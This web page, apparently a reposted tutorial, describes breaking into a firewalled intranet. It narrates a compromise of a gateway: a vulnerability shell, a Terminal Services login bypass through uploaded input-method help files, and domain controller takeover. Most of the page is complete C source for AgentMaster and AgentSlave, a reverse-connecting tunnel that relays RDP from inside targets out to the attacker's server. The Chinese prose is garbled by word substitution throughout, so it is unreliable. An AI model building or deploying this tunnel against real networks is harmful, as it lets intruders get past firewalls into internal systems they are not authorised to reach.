设为主页 | 加入收藏 | 繁體中文

如何突破TCP-IP过滤/防火墙进入内网


  {
  printf("\nsend() to Client failed:%d",GetLastError());
  break;
  }
  printf("\nsend %d bytes to Client",iRet);
  iLeft-=iRet;
  idx+=iRet;
  }
  //清空缓冲区
  memset(szSendToClientBuff,0,BuffSize);
  iSTCBCS=0;
  }
  }//end of select ret
  Sleep(1);
  }//end of while
  return 0;
  }
  (使用TCP socket转发和反弹TCP端口进入有防火墙保护的内网)
  事实上许多内网没有第一部分所说的那么简略啦,我们来看一个有防火墙保护的内网,条件是这个防火墙对反弹TCP端口不做限制,限制了的话,又另当别论了。假定网络拓扑如下:
  下面的网络拓扑是我在一次对朋侪公司网站授权入侵历程中遇到的。
  〈1〉我本身处于公司内网192.168.0.2,通过公司网关202.1.1.1到Internet,但我是网关的admin:)。
  〈2〉仇人[其实是friend啦]的网关OS是2k adv
  server,在外网网卡上做了TCP/IP限制,只开放了25,53,80,110,3306这几个TCP
  PORT,通过一个漏洞,我失掉了一个shell,可以通过IE来实行系统下令,虽然权限很低。网关有终端办事,登陆验证漏洞补丁未安装,但输入法帮助文件已经被删除了,但是我们可以通过shell把输入法帮助文件upload上去,因为他的系统权限没有设置好,我们可以写,呵呵。这样的话,我们只要可以或许毗连到他的终端办事上去,我们就能绕过登陆验证,失掉admin权限了。怎样毗连?有办法,用TCP
  socket转发。和第一部辩白的一样吗?有些差别。因为他做了TCP/IP限制,我们不能毗连他,只能让他来毗连我们了,TCP反弹端口,呵呵。
  打击流程如下:
  〈1〉在我的办事器202.1.1.1运转AgentMaster,监听TCP PORT
  12345,等候202.2.2.2来毗连,监听TCP PORT 3389,等候我192.168.0.2毗连。
  〈2〉在仇人网关机器202.2.2.2运转AgentSlave,毗连到202.1.1.1 TCP PORT
  12345[细致:是反弹端口,TCP/IP过滤也拿他没办法]
  〈3〉我本身192.168.0.2用TermClient毗连到本身的办事器202.1.1.1:3389
  〈4〉仇人网关上的AgentSlave毗连到本身本身在内网的IP==〉192.168.1.1:3389
  〈5〉数据通道就建立好啦。两个署理老实的为我们转发数据,呵呵。当我们毗连本身办事器的3389,其实出来的是仇人内网的某台机器,呵呵。
  后来发明仇人的主域控制器是192.168.1.4,通过后面与他网关建立的毗连,使用一个漏洞方便的获得主域的admin权限,呵呵。他可能认为主域在内网,网关又做了TCP/IP过滤,打击者没有办法进入。我只要把AgentSlave设置为毗连192.168.1.4:3389,当前就可以直接毗连他的主域控制器啦,不过在网关登陆也一样。
  步伐代码如下[步伐中所用到的TCPDataRedird.c已经贴在第一部分,谁人文件做数据转发,通用的:
  /指导指导指导指导指导指导指导指导指导指导指导指导指导
  Module Name:AgentMaster.c
  Date:2001/4/16
  CopyRight(c) eyas
  阐明:scoket署理主控端,卖力监听两个TCP socket,等候打击者和AgentSlave来毗连,两个
  scoket都毗连乐成后,开端转发数据
  sock[0]是client==〉sock[0] sock[1]是target==〉sock[1]
  指导指导指导指导指导指导指导指导指导指导指导指导指导/
  #include 〈stdio.h〉
  #include 〈winsock2.h〉
  #include "TCPDataRedird.c"
  #pragma comment(lib,"ws2_32.lib")
  #define TargetPort 3389//假装的target的监听端口
  #define LocalPort 12345//等候AgentSlave来connect的端口
  int main()
  {
  WSADATA wsd;
  SOCKET s3389=INVALID_SOCKET,//本机监听的socket,等候打击者毗连
  s1981=INVALID_SOCKET,//监听的socket,等候AgentSlave来毗连
  sock[2]={INVALID_SOCKET,INVALID_SOCKET};
  struct sockaddr_in Local3389,Local1981,Attack,Slave;
  int iAddrSize;
  HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
  hThreadT2C=NULL;//T2C=TargetToClient
  DWORD dwThreadID;
  __try
  {
  //load winsock library
  if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
  {
  printf("\nWSAStartup() failed:%d",GetLastError());
  __leave;
  }
  //create socket
  s3389=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
  if(s3389==INVALID_SOCKET)
  {
  printf("\nsocket() failed:%d",GetLastError());
  __leave;
  }
  //create socket
  s1981=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
  if(s1981==INVALID_SOCKET)
  {
  printf("\nsocket() failed:%d",GetLastError());
  __leave;
  }
  //fill the struct
  Local3389.sin_addr.s_addr=htonl(INADDR_ANY);
  Local3389.sin_family=AF_INET;
  Local3389.sin_port=htons(TargetPort);
  Local1981.sin_addr.s_addr=htonl(INADDR_ANY);
  Local1981.sin_family=AF_INET;
  Local1981.sin_port=htons(LocalPort);
  //bind s3389 for attacker
  if(bind(s3389,(struct sockaddr
  *)&Local3389,sizeof(Local3389))==SOCKET_ERROR)
  {
  printf("\nbind() failed:%d",GetLastError());
  __leave;
  }
  //listen for attacker to connect
  if(listen(s3389,1)==SOCKET_ERROR)
  {
  printf("\nlisten() failed:%d",GetLastError());
  __leave;
  }
  //bind s1981 for AgentSlave
  if(bind(s1981,(struct sockaddr
  *)&Local1981,sizeof(Local1981))==SOCKET_ERROR)
  {
  printf("\nbind() failed:%d",GetLastError());
  __leave;
  }
  //listen for AgentSlave to connect
  if(listen(s1981,1)==SOCKET_ERROR)
  {
  printf("\nlisten() failed:%d",GetLastError());
  __leave;
  }
  //socket循环
  while(1)
  {
  //wait for AgentSlave to connect
  iAddrSize=sizeof(Slave);
  sock[1]=accept(s1981,(struct sockaddr *)&Slave,&iAddrSize);
  if(sock[1]==INVALID_SOCKET)
  {
  printf("\naccept() failed:%d",GetLastError());
  break;
  }
  printf("\nAccept AgentSlave==〉%s:%d",inet_ntoa(Slave.sin_addr),
  ntohs(Slave.sin_port));
  //wait for Attacker to connect
  iAddrSize=sizeof(Attack);
  sock[0]=accept(s3389,(struct sockaddr *)&Attack,&iAddrSize);
  if(sock[0]==INVALID_SOCKET)
  {
  printf("\naccept() failed:%d",GetLastError());
  break;
  }
  printf("\nAccept Attacker==〉%s:%d",inet_ntoa(Attack.sin_addr),
  ntohs(Attack.sin_port));
  //创建两个线程举行数据转发
  hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);
  hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);
  //等候两个线程竣事
  WaitForSingleObject(hThreadC2T,INFINITE);
  CloseHandle(hThreadC2T);
  CloseHandle(hThreadT2C);
  closesocket(sock[0]);
  closesocket(sock[1]);
  }//end of socket while
  }//end of try
  __finally
  {
  //clean all
  if(s3389!=INVALID_SOCKET) closesocket(s3389);
  if(s1981!=INVALID_SOCKET) closesocket(s1981);
  if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);
  if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);
  if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);
  if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);
  WSACleanup();
  }
  return 0;
  }
  /指导指导指导指导指导指导指导指导指导指导指导指导指导*****
  Module:AgentSlave.c
  Date:2001/4/17
  Copyright(c)eyas
  HomePage:www.patching.net
  阐明:这个步伐卖力毗连终极目标,毗连主控端,然后转发数据
  这里毗连到AgenrMaster的socket相当与sClient==〉sock[0],
  毗连到终极目标的socoket是sTarget==〉sock[1]
  指导指导指导指导指导指导指导指导指导指导指导指导指导*****/
  #include 〈stdio.h〉
  #include 〈winsock2.h〉
  #include "TCPDataRedird.c"
  #pragma comment(lib,"ws2_32.lib")
  #define TargetIP "192.168.1.3"
  #define TargetPort (int)3389
  #define AgentMasterIP "202.1.1.1"
  #define AgentMasterPort (int)12345
  int main()
  {
  WSADATA wsd;
  SOCKET sock[2]={INVALID_SOCKET,INVALID_SOCKET};
  struct sockaddr_in Master,Target;
  HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
  hThreadT2C=NULL;//T2C=TargetToClient
  DWORD dwThreadID;
  __try
  {
  //load winsock library
  if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
  {
  printf("\nWSAStartup() failed:%d",GetLastError());
  __leave;
  }
  //循环
  while(1)
  {
  //create client socket
  sock[0]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
  if(sock[0]==INVALID_SOCKET)
  {
  printf("\nsocket() failed:%d",GetLastError());
  __leave;
  }
  //create target socket
  sock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
  if(sock[1]==INVALID_SOCKET)
  {
  printf("\nsocket() failed:%d",GetLastError());
  __leave;
  }
  //fill struct
  Target.sin_family=AF_INET;
  Target.sin_addr.s_addr=inet_addr(TargetIP);
  Target.sin_port=htons(TargetPort);
  Master.sin_family=AF_INET;
  Master.sin_addr.s_addr=inet_addr(AgentMasterIP);
  Master.sin_port=htons(AgentMasterPort);
  //connect to AgentMaster
  if(connect(sock[0],(struct sockaddr
  *)&Master,sizeof(Master))==SOCKET_ERROR)
  {
  //毗连失败后,等候一下子再连
  printf("\nconnect() to master failed:%d",GetLastError());
  closesocket(sock[0]);
  closesocket(sock[1]);
  Sleep(5000);
  continue;
  }
  printf("\nconnect to %s %d success!",AgentMasterIP,AgentMasterPort);
  //connect to target
  if(connect(sock[1],(struct sockaddr
  *)&Target,sizeof(Target))==SOCKET_ERROR)
  {
  printf("\nconnect() to target failed:%d",GetLastError());
  __leave;
  }
  printf("\nconnect to %s %d success!",TargetIP,TargetPort);
  //创建两个线程举行数据转发
  hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);
  hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);
  //等候两个线程竣事
  WaitForSingleObject(hThreadC2T,INFINITE);
  CloseHandle(hThreadC2T);
  CloseHandle(hThreadT2C);
  closesocket(sock[0]);
  closesocket(sock[1]);
  }//end of while
  }//end of try
  __finally
  {
  if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);
  if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);
  if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);
  if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);
  WSACleanup();
  }
  return 0;
  }
 


    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码: